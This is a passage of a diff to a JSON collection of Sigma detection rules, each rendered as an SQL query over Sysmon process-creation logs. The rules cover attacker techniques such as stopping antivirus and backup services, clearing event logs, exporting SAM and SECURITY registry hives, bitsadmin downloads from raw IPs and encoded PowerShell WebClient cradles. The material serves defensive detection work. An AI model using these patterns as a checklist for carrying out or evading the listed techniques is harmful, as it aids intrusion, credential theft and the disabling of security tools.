CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", @@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": 